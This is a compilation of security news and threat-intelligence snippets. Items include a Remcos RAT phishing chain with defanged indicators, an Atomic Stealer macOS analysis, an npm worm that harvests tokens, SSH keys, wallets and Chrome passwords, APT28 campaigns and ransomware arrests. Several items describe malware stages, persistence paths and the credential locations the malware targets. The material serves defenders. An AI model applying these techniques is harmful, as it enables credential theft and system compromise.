Any\[.\]run identified a multi-stage phishing campaign using a Google Drive-themed lure and delivering Remcos RAT. Attackers place the HTML on storage\[.\]googleapis\[.\]com, abusing trusted infrastructure instead of hosting the phishing page on a newly registered domain. The chain leverages RegSvcs.exe, a legitimate signed Microsoft/.NET binary with a clean VirusTotal hash. Combined with trusted hosting, this makes reputation-based detection unreliable and lowers alert priority during triage. File reputation alone is not enough. Detection depends on behavioral analysis and sandboxing. The page mimics a Google Drive login form, collecting email, password, and OTP. After a “successful login,” the victim is prompted to download Bid-Packet-INV-Document.js, triggering a multi-stage delivery chain: S (WSH launcher + time-based evasion) -> VBS Stage 1 (download + hidden execution) -> VBS Stage 2 (%APPDATA%\\WindowsUpdate + Startup persistence) -> DYHVQ.ps1 (loader orchestration) -> ZIFDG.tmp (obfuscated PE / Remcos payload) -> Textbin-hosted obfuscated .NET loader (in-memory via Assembly.Load) -> %TEMP%\\RegSvcs.exe hollowing/injection -> Partially fileless Remcos + C2 Analysis session: [https://app.any.run/tasks/0efd1390-c17a-49ce-baef-44b5bd9c4a97](https://app.any.run/tasks/0efd1390-c17a-49ce-baef-44b5bd9c4a97/?utm_source=reddit) TI Lookup query: [domainName:www.freepnglogos.com and domainName:storage.googleapis.com and threatLevel:malicious](https://intelligence.any.run/analysis/lookup?utm_source=reddit#%7B%22query%22:%22domainName:%5C%22www.freepnglogos.com%5C%22%20and%20domainName:%5C%22storage.googleapis.com%5C%22%20and%20threatLevel:%5C%22malicious%5C%22%22,%22dateRange%22:30%7D) IOCs Phishing URLs: hxxps://storage\[.\]googleapis\[.\]com/pa-bids/GoogleDrive.html hxxps://storage\[.\]googleapis\[.\]com/com-bid/GoogleDrive.html hxxps://storage\[.\]googleapis\[.\]com/contract-bid-0/GoogleDrive.html hxxps://storage\[.\]googleapis\[.\]com/in-bids/GoogleDrive.html hxxp://storage\[.\]googleapis\[.\]com/out-bid/GoogleDrive.html Credential exfiltration domains: usmetalpowders\[.\]co iseeyousmile9\[.\]com Credential exfiltration path: /1a/uh.php Malware staging host: brianburkeauction\[.\]com Source: r/ANYRUN
In Lebanon, nearly 1 in 5 people has been displaced by Israeli attacks, leaving the government to manage a modern crisis without modern digital infrastructure.
Cybersecurity researchers have flagged a new variant ofmalware called Chaosthat'scapable of hitting misconfigured cloud deployments, marking an expansion of the botnet's targeting infrastructure. "Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices," Darktrace said in a new report.
Cybersecurity researchers have lifted the curtain on a stealthy botnet that's designed for distributed denial-of-service (DDoS) attacks. Called Masjesu, the botnet has been advertised via Telegram as a DDoS-for-hire service since it first surfaced in 2023. It's capable of targeting a wide range of IoT devices, such as routers and gateways, spanning multiple architectures. "Built for
The Russian threat actor known as APT28 (aka Forest Blizzard and Pawn Storm) has been linked to a fresh spear-phishing campaign targeting Ukraine and its allies to deploy a previously undocumented malware suite codenamed PRISMEX. "PRISMEX combines advanced steganography, component object model (COM) hijacking, and legitimate cloud service abuse for command-and-control," Trend Micro
Atomic Stealer (AMOS) macOS Malware Decryption, Anti-VM, Hardware Wallet Trojanization & Persistent Backdoor
Picked up a low-VT AMOS sample on March 12 worth flagging. Aligns with the recent malext variants but layers a few things we haven't seen combined before: * **Custom multi-stage decryption** (hex → ASCII → base64 via custom hash table) serving obfuscated osascript payloads at runtime — static analysis gets you almost nothing * **Anti-VM** via `system_profiler` checking for QEMU/VMware/KVM processor strings and known sandbox hardware serials, run twice before payload delivery * **Payload written to** `/bin/zsh` **child process iteratively via** `write()` **loop** — no plaintext payload on disk * **300+ crypto extension IDs** targeted + full desktop wallet scraping * **Hardware wallet trojanization** — silently replaces Ledger, Trezor, and Exodus with adhoc-signed phishing lookalikes that harvest passwords and seed phrases to `systellis[.]com` * **Three-layer persistence**: root LaunchDaemon (`com.finder.helper`) → `~/.mainhelper` backdoor pulled from C2 → `~/.agent` polling loop that pivots backdoor execution into the active console user's context every second via `stat -f "%Su" /dev/console`
Linux malware often hides in Berkeley Packet Filter (BPF) socket programs, which are small bits of executable logic that can be embedded in the Linux kernel to customize how it processes network traffic. Some of the most persistent threats on the Internet use these filters to remain dormant until they receive a specific "magic" packet. Because these filters can be hundreds of instructions long and involve complex logical jumps, reverse-engineering them by hand is a slow process that creates a bottleneck for security researchers. To find a better way, we looked at symbolic execution: a method of treating code as a series of constraints, rather than just instructions. By using the Z3 theorem prover, we can work backward from a malicious filter to automatically generate the packet required to trigger it. In this post, we explain how we built a tool to automate this, turning hours of manual assembly analysis into a task that takes just a few seconds. The complexity ceiling Before we look at how to deconstruct malicious filters, we need to understand the engine running them. The Berkeley Packet Filter (BPF) is a highly efficient technology that allows the kernel to pull specific packets from the network stack based on a set of bytecode instructions. While many modern developers are familiar with eBPF (Extended BPF), the powerful evolution used for observability and security, this post focuses on "classic" BPF. Originally designed for tools like tcpdump, classic BPF uses a simple virtual machine with just two registers to evaluate network traffic at high speeds. Because it runs deep within the kernel and can "hide" traffic from user-space tools, it has become a favorite tool for malware authors looking to build stealthy backdoors. Creating a contextual representation of BPF instructions
The Fragmented State of Modern Enterprise Identity Enterprise IAM is approaching a breaking point. As organizations scale, identity becomes increasingly fragmented across thousands of applications, decentralized teams, machine identities, and autonomous systems. The result is Identity Dark Matter: identity activity that sits outside the visibility of centralized IAM and
Two practice web addresses appear to have been compromised Multiple domains belonging to Scottish healthcare providers have been hijacked and are now pushing links to adult content and illegal sports streams, according to a researcher.…
The North Korea-linked persistent campaign known as Contagious Interview has spread its tentacles by publishing malicious packages targeting the Go, Rust, and PHP ecosystems. "The threat actor's packages were designed to impersonate legitimate developer tooling [...], while quietly functioning as malware loaders, extending Contagious Interview’s established playbook into a coordinated
Reverse-engineered the Whoop 4.0 BLE protocol — CRC-32 with non-standard polynomial, 96-byte real-time data packets
[CVE-2026-34980](https://github.com/OpenPrinting/cups/security/advisories/GHSA-4852-v58g-6cwf) and [CVE-2026-34990](https://github.com/OpenPrinting/cups/security/advisories/GHSA-c54j-2vqw-wpwp)
In Telegram groups, men are sharing thousands of nonconsensual images of women and girls, buying spyware, and engaging in doxing and sexual abuse.
President Brad Smith tells an interviewer that Microsoft is reconsidering datacenter design in light of Iran war Microsoft is reevaluating how it designs and builds datacenters in conflict-prone regions after Iran began targeting Middle Eastern bit barns in retaliation for US military operations.…
@fairwords npm packages compromised by a self-propagating credential worm - steals tokens, infects other packages you own, then crosses to PyPI
Three @`fairwords` scoped npm packages were hit today by what appears to be the TeamPCP/CanisterWorm campaign. The interesting part isn't just the credential theft, it's what it does with your npm token afterward. **What the postinstall payload does:** * Harvests environment variables matching 40+ patterns (AWS, GCP, Azure, GitHub, OpenAI, Stripe, etc.) * Reads SSH keys, `.npmrc`, `.kube/config`, Docker auth, Terraform credentials, `.git-credentials` * Steals crypto wallet data - Solana keypairs, Ethereum keystores, MetaMask LevelDB, Phantom, Exodus, Atomic Wallet * Decrypts Chrome saved passwords on Linux using the well-known hardcoded PBKDF2 key (`"peanuts"` / `"saltysalt"`) * Scans `/proc/[pid]/environ` for tokens in other running processes **Affected versions:** * `fairwords/websocket` 1.0.38 and 1.0.39 * `fairwords/loopback-connector-es` 1.4.3 and 1.4.4 * `fairwords/encryption` 0.0.5 and 0.0.6 If you have any of these installed, rotate npm tokens, cloud keys, SSH keys immediately and check whether any packages you maintain received unexpected version bumps. Full analysis with IOCs and payload walkthrough in the blog.
Iran-affiliated cyber actors are targeting internet-facing operational technology (OT) devices across critical infrastructures in the U.S., including programmable logic controllers (PLCs), cybersecurity and intelligence agencies warned Tuesday. "These attacks have led to diminished PLC functionality, manipulation of display data and, in some cases, operational disruption and financial
Tuesday, April 7
Cloudflare is accelerating its post-quantum roadmap. We now target 2029 to be fully post-quantum (PQ) secure including, crucially, post-quantum authentication. At Cloudflare, we believe in making the Internet private and secure by default. We started by offering free universal SSL certificates in 2014, began preparing our post-quantum migration in 2019, and enabled post-quantum encryption for all websites and APIs in 2022, mitigating harvest-now/decrypt-later attacks. While we’re excited by the fact that over 65% of human traffic to Cloudflare is post-quantum encrypted, our work is not done until authentication is also upgraded. Credible new research and rapid industry developments suggest that the deadline to migrate is much sooner than expected. This is a challenge that any organization must treat with urgency, which is why we’re expediting our own internal Q-Day readiness timeline. What happened? Last week, Google announced they had drastically improved upon the quantum algorithm to break elliptic curve cryptography, which is widely used to secure the Internet. They did not reveal the algorithm, but instead provided a zero-knowledge proof that they have one. This is not even the biggest breakthrough. That same day, Oratomic published a resource estimate for breaking RSA-2048 and P-256 on a neutral atom computer. For P-256, it only requires a shockingly low 10,000 qubits. Google’s motivatio
AI coding tools are being shipped fast. In too many cases, basic security is not keeping up. In our latest research, we found the same sandbox trust-boundary failure pattern across tools from Anthropic, Google, and OpenAI. Anthropic fixed and engaged quickly (CVE-2026-25725). Google did not ship a fix by disclosure. OpenAI closed the report as informational and did not address the core architectural issue. That gap in response says a lot about vendor security posture.
The AI lab's Project Glasswing will bring together Apple, Google, and more than 45 other organizations. They'll use the new Claude Mythos Preview model to test advancing AI cybersecurity capabilities.
The Russia-linked threat actor known as APT28 (aka Forest Blizzard) has been linked to a new campaign that has compromised insecure MikroTik and TP-Link routers and modified their settings to turn them into malicious infrastructure under their control as part of a cyber espionage campaign since at least May 2025. The large-scale exploitation campaign has been codenamed
WhatsApp’s new “Private Inference” feature represents one of the most ambitious attempts to combine end-to-end encryption with AI-powered capabilities, such as message summarization. To make this possible, Meta built a system that processes encrypted user messages inside trusted execution environments (TEEs), secure hardware enclaves designed so that not even Meta can access the plaintext. Our now-public audit , conducted before launch, identified several vulnerabilities that compromised WhatsApp’s privacy model, all of which Meta has patched. Our findings show that TEEs aren’t a silver bullet: every unmeasured input and missing validation can become a vulnerability, and to securely deploy TEEs, developers need to measure critical data, validate and never trust any unmeasured data, and test thoroughly to detect when components misbehave. The challenge of using AI with end-to-end encryption WhatsApp’s Private Processing attempts to resolve a fundamental tension: WhatsApp is end-to-end encrypted, so Meta’s servers cannot read, alter, or analyze user messages. However, if users also want to opt in to AI-powered features like message summarization, this typically requires sending plaintext data to servers for computationally expensive processing. To solve this, Meta uses TEEs based on AMD’s SEV-SNP and Nvidia’s confidential GPU platforms to process messages in a secure enclave where even Meta can’t access them or learn meaningful information about the message contents. The stakes in WhatsApp are high, as vulnerabilities could expose millions of users’ private messages. Our review identified 28 issues, including eight high-severity findings that could h
In Brief The Question Every Board Is Asking Cybersecurity environments grow more complex every year. Cloud infrastructure expands daily. New applications appear. APIs multiply. Attackers increasingly use automation and purpose-built AI tools—including offensive tools like GhostGPT—to identify weaknesses faster than security teams can remediate them. At RSA 2026, the recurring theme across the keynote stages […] The post Continuous Security Validation: Why It Matters and Why Synack Is Built for It appeared first on Synack .
Common Entra ID Security Assessment Findings – Part 3: Weak Privileged Identity Management Configuration
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to provide a clearer understanding of the underlying risks and practical implications. Part 1: Privileged Foreign Enterprise Applications Part 2: Privileged Unprotected Groups What Is Privileged Identity Management? Privileged Identity Management (PIM) is a service in Microsoft Entra ID that enables organizations to manage, control, and monitor privileged access. The main features are: Provide just-in-time privileged access Assign time-bound access and end dates Require approval or multifactor authentication to activate privileged roles Require written justification for role activation Generate notifications when privileged roles are activated A common use case is to avoid permanently assigning the Global Administrator role. Instead, users or group members are made eligible to activate the role only when needed and only for a limited period.
Obvious signs: High cpu activity without any "visible" reason. The malware creates a fake dwm.exe process. That process is additional to the original dwm.exe of Windows. It connects to a dutch vps. It hides itself from the most comon end-user used process listing methods (task manager, sysinternals process explorer, perfmon etc.). It is not detected by Windows Defender, by Malwarebytes and ESET NOD32. It can be spotted when renaming SysInternals Process Explorer executable or using a tool like System Informer. Process Explorer is unable to kill this process, while System Informer is. Based on what I see, that dmw.exe doesn't exist as file, only in memory. [The fake process](https://preview.redd.it/qp97mhlicptg1.png?width=1477&format=png&auto=webp&s=46d6df54823a7a5f62d9f35742b80588a9a0a39d) [Protected process ](https://preview.redd.it/m25ruvflcptg1.png?width=531&format=png&auto=webp&s=77de33543669aaa63ae4650f659da07ebbfb8857) [The unauthorized connection](https://preview.redd.it/tsjxbgkscptg1.png?width=544&format=png&auto=webp&s=049cd62975df2f02ba09d08fb27c6deca525f44c)
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite This week, more time than I'd have liked to spend went on talking about the trials of chasing invoices. This is off the back of a customer (who, for now, will remain unnamed), who had invoices stacking back more than 6 months overdue and despite payment terms of 30 days, paid on an average of 80 days . But as I say in this week's video, more than anything, it was the gall of the CEO to take issue with my frustrated tone rather than with their complete lack of respect for basic business etiquette and paying one's suppliers. And so, Copilot and I spent the weekend fixing up a nice little Xero integration to ensure this never happens again. If you arrive at this post sometime in the future after finding your HIBP enterprise service no longer functioning weeks after an unpaid invoice was due, at least you'll know it's not personal... and pay your damn bills!
We're launching C2 Detection — a new GreyNoise intelligence module that gives you two distinct, high-confidence signals that a device in your environment has been compromised.
Monday, April 6
Cloudflare was designed to be simple to use for even the smallest customers, but it’s also critical that it scales to meet the needs of the largest enterprises. While smaller customers might work solo or in a small team, enterprises often have thousands of users making use of Cloudflare’s developer, security, and networking capabilities. This scale can add complexity, as these users represent multiple teams and job functions. Enterprise customers often use multiple Cloudflare Accounts to segment their teams (allowing more autonomy and separation of roles), but this can cause a new set of problems for the administrators by fragmenting their controls. That’s why today, we’re launching our new Organizations feature in beta — to provide a cohesive place for administrators to manage users, configurations, and view analytics across many Cloudflare Accounts. Principle of least privilege The principle of least privilege is one of the driving factors behind enterprises using multiple accounts. While Cloudflare’s role-based access control (RBAC) system now offers fine-grained permissions for many resources, it can be cumbersome to enumerate all the resources one by one. Instead, we see enterprises use multiple accounts, so each team’s resources are managed by that team alone. This allows organic growth within the account: they can add new resources as needed, without giving Administrative control too widely. While multiple accounts are great at limiting permissions for most of the users within an organization, they complicate things for the administrators, as the administrators need to be added to every account and given the appropriate
The Kill Chain models how an attack succeeds. The Attack Helix models how the offensive baseline improves. The Tipping Point One person. Two AI subscriptions. Ten government agencies. 150 gigabytes of sovereign data. In December of 2025, a single unidentified operator used Anthropic’s Clau
Nonprofits run out of US Border Patrol stations are also selling other “operation”-themed coins that include a phrase popularized by the Proud Boys, potentially in violation of government rules.
With Cloudflare now supporting PQC encryption, I thought it'd be a fun experiment to see if I could encapsulate Plex traffic in a tunnel since it's not supported natively. 🤓
To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.
An elusive hacker who went by the handle “ UNKN ” and ran the early Russian ransomware groups GandCrab and REvil now has a name and a face. Authorities in Germany say 31-year-old Russian Daniil Maksimovich Shchukin headed both cybercrime gangs and helped carry out at least 130 acts of computer sabotage and extortion against victims across the country between 2019 and 2021. Shchukin was named as UNKN (a.k.a. UNKNOWN) in an advisory published by the German Federal Criminal Police (the “Bundeskriminalamt” or BKA for short). The BKA said Shchukin and another Russian — 43-year-old Anatoly Sergeevitsch Kravchuk — extorted nearly $2 million euros across two dozen cyberattacks that caused more than 35 million euros in total economic damage. Daniil Maksimovich SHCHUKIN, a.k.a. UNKN, and Anatoly Sergeevitsch Karvchuk, alleged leaders of the GandCrab and REvil ransomware groups. Germany’s BKA said Shchukin acted as the head of one of the largest worldwide operating ransomware groups GandCrab and REvil, which pioneered the practice of double extortion — charging victims once for a key needed to unlock hacked systems, and a separate payment in exchange for a promise not to publish stolen data. Shchukin’s na
Sunday, April 5
When Syrian government accounts were hijacked in March, the breach looked chaotic. But it revealed something more troubling: a state struggling with the most basic layer of cybersecurity.
Saturday, April 4
Plus: The FBI says a recent hack of its wiretap tools poses a national security risk, attackers stole Cisco source code as part of an ongoing supply chain hacking spree, and more.